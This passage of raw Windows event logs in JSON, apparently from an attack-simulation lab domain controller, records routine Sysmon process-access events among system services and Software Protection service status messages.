ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.952","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-0010E31C0500}","TargetProcessId":"3136","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:21.952\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001030530000}\r\nSourceProcessId: 852\r\nSourceThreadId: 1116\r\nSourceImage: C:\\Windows\\system32\\services.exe\r\nTargetProcessGUID: {E2A3D6B1-10E9-5F25-0000-0010E31C0500}\r\nTargetProcessId: 3136\r\nTargetImage: C:\\Windows\\system32\\sppsvc.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:21.952","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001030530000}","SourceProcessId":"852","SourceThreadId":"1116","SourceImage":"C:\\Windows\\system32\\services.exe","TargetProcessGUID":"{E2A3D6B1-10E9-5F25-0000-0010E31C0500}","TargetProcessId":"3136","TargetImage":"C:\\Windows\\system32\\sppsvc.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\services.exe+18ff|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1066,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12121,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"Initialization status for service objects.\r\nC:\\Windows\\system32\\sppwinob.dll, msft:spp/windowsfunctionality/agent/7.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/inherited/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/phone/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:rm/algorithm/pkey/detect, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/ActionScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/TaskScheduler/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/statecollector/pkey, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/1.0, 0x00000000, 0x00000000\nC:\\Windows\\system32\\sppobjs.dll, msft:spp/volume/services/kms/activationinfo/1.0, 0x00000000, 0x00000000\n","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1003,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12122,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has completed licensing status check.\r\nApplication Id=55c92734-d682-4d71-983e-d6ec3f16059f\r\nLicensing Status=\n1: 21c56779-b449-4d20-adfc-eece0e1ad74b, 1, 1 [(0 [0x00000000, 1, 0], [(?)( 1 0x00000000)(?)( 2 0x00000000 0 0 msft:rm/algorithm/volume/1.0 0x4004F040 259190)(?)(?)( 10 0x00000000 msft:rm/algorithm/flags/1.0)(?)])(1 )(2 )(3 )]\n2: 2e7a9ad1-a849-4b56-babe-17d5a29fe4b4, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n3: 3c006fa7-3b03-45a4-93da-63ddc1bdce11, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n4: 3c2da9a5-1c6e-45d1-855f-fdbef536676f, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n5: 562634bb-b8d8-43eb-8325-bf63a42c4174, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n6: 58448dfb-6ac0-4e06-b491-07f2b657b268, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n7: 942efa8f-516f-46d8-8541-b1ee1bce08c6, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n8: 9db83b52-9904-4326-8957-ebe6feedf37c, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n9: a43f7b89-8023-413a-9f58-b8aec2c04d00, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n10: cbf3499f-848e-488b-a165-ac6d7e27439d, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n11: d6992aac-29e7-452a-bf10-bbfb8ccabe59, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n12: d839f159-1128-480b-94b6-77fa9943a16a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n13: fea51083-1906-44ed-9072-86af9be7ab9a, 1, 0 [(0 [0xC004F014, 0, 0], [(?)(?)(?)(?)(?)(?)(?)(?)])(1 )(2 )(3 )]\n\n","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":36028797018963968,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":902,"SourceName":"Microsoft-Windows-Security-SPP","ProviderGuid":"{E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":12123,"ProcessID":0,"ThreadID":0,"Channel":"Application","Message":"The Software Protection service has started.\r\n10.0.14393.3541","EventReceivedTime":"2020-08-01 06:51:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.249\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 988\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {E2A3D6B1-105B-5F25-0000-001056BA0000}\r\nTargetProcessId: 1140\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.249","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","SourceProcessId":"864","SourceThreadId":"988","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{E2A3D6B1-105B-5F25-0000-001056BA0000}","TargetProcessId":"1140","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+1b05d|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3031,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.249\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.249","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fa3b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3032,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.249\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1058-5F25-0000-001012540000}\r\nTargetProcessId: 864\r\nTargetImage: C:\\Windows\\system32\\lsass.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.249","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1058-5F25-0000-001012540000}","TargetProcessId":"864","TargetImage":"C:\\Windows\\system32\\lsass.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+fb8b|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3033,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.265\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.265","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:22","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3034,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:22.265\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-105F-5F25-0000-001055BD0100}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:22.265","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-105F-5F25-0000-001055BD0100}","TargetProcessId":"2868","TargetImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:24","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
